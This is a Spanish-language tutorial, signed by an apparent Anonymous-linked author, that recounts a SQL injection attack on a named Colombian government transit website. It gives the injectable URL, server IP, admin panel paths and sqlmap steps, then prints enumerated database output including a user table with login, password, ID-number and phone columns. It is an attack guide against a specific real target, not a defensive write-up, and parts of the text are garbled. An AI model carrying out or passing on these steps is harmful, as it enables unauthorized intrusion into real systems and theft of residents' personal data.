Professional Documents
Culture Documents
By : @ Miguel Anons
Saludos En esta ocasión para todos y todas he decidido sacar este pequeño tutorial a través de
este documento sobre un ataque informático realizado al metro línea el año 2012 lo cual hoy en
día sigue siendo un gran problema el tema de la seguridad en muchos sitios web bajo errores de ,
sql , php , xss , y muchos errores más . Pero hoy he decidido a enseñarles ataques bajo MySQL
sql en la distribución del Linux versión kali Linux .
Target :
[+]http://metrolinea.gov.co/
Ip= (216.227.215.125)
[*]http://metrolinea.gov.co/Noticia.php?id=6´
Accesos :
http://www.metrolinea.gov.co/controlpanel/
http://www.metrolinea.gov.co/admin
http://www.metrolinea.gov.co/cms/
http://metrolinea.gov.co/controlpanel/
http://metrolinea.gov.co/cpanel/
Dns:
http://www.netip.de/dns?domain=www.metrolinea.gov.co%2F
http://www.netip.de/dns?domain=https%3A%2F%2Fwww.metrolinea.gov.co%2F
Abrimos en Applications
Bajamos a kali linux y luego en web applications , Des pues en web vulnerability Scanners y
buscamos , sqlmap y le damos clic .
Des pues escribimos los siguientes comandos en la con sola del SQL :
sqlmap-u Aquí ponemos el target de la web que vamos a inyectar con el error y des pues ponemos
--dbs Así por ejemplo :
y nos saldrá esta info : Database: information_schema [45 tables] Asi como lo muestra la
imagen con la información Así :
Database: information_schema
[45 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| THREAD_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
+---------------------------------------+
Y des pues volvemos y aplicamos el code : con su comando así :
Database: metro31_metrolineacsvfinal
[36 tables]
+------------------------+
| Pregunta |
| Respuesta |
| album |
| asunto |
| banner |
| boletin |
| cargo |
| contactenos |
| cuestionario |
| cuestionariorespuesta |
| documentos |
| faq |
| fondopagina |
| fotos |
| glosario |
| historial |
| horarioruta |
| imagenesbanner |
| imagenesmedioamb |
| imagenesninos |
| institucional |
| ipencuestas |
| metrocam |
| modulos |
| noticias |
| noticiashome |
| noticiasninos |
| ocupacion |
| pagina |
| paginasamigas |
| relusuarioshorarioruta |
| relusuariosruta |
| ruta |
| tipousuario |
| tipovehiculo |
| usuarios |
+------------------------+
Database: metro31_metrolineacsvfinal
Table: usuarios
[29 columns]
+-----------------------+----------------------+
| Column | Type |
+-----------------------+----------------------+
| apellidos | varchar(250) |
| campo1 | varchar(250) |
| campo2 | varchar(250) |
| campo3 | varchar(250) |
| campo4 | varchar(250) |
| celular | varchar(50) |
| ciudad | varchar(250) |
| de | varchar(250) |
| direccion | varchar(250) |
| email | varchar(250) |
| enlinea | smallint(6) |
| estadocivil | varchar(60) |
| fechanac | date |
| foto | varchar(250) |
| login | varchar(60) |
| nombre | varchar(250) |
| nrodocumento | varchar(50) |
| pass | varchar(250) |
| targetainteligente | bigint(20) |
| telefono | varchar(250) |
| tipodoc | varchar(10) |
+-----------------------+----------------------+
Des pues volvemos al code Así para los usuarios y nos saldrá la siguiente información ya para
finalizar, volvemos y ejecutamos el siguiente y último comando Así :
Usuarios:
+--------------+----------------------------------------------+
| Login | Pass |
+--------------+----------------------------------------------+
+-------------------------------------------------------------+
Alfinalizar un largo procceso esto mequedo de evidencia con fotos y los pequeños de talles que
les publique atraves de la en señanza de hoy .
IMÁGENES :
#Anonymous-Anonops # SEA
FIN
By : @ Miguel Anons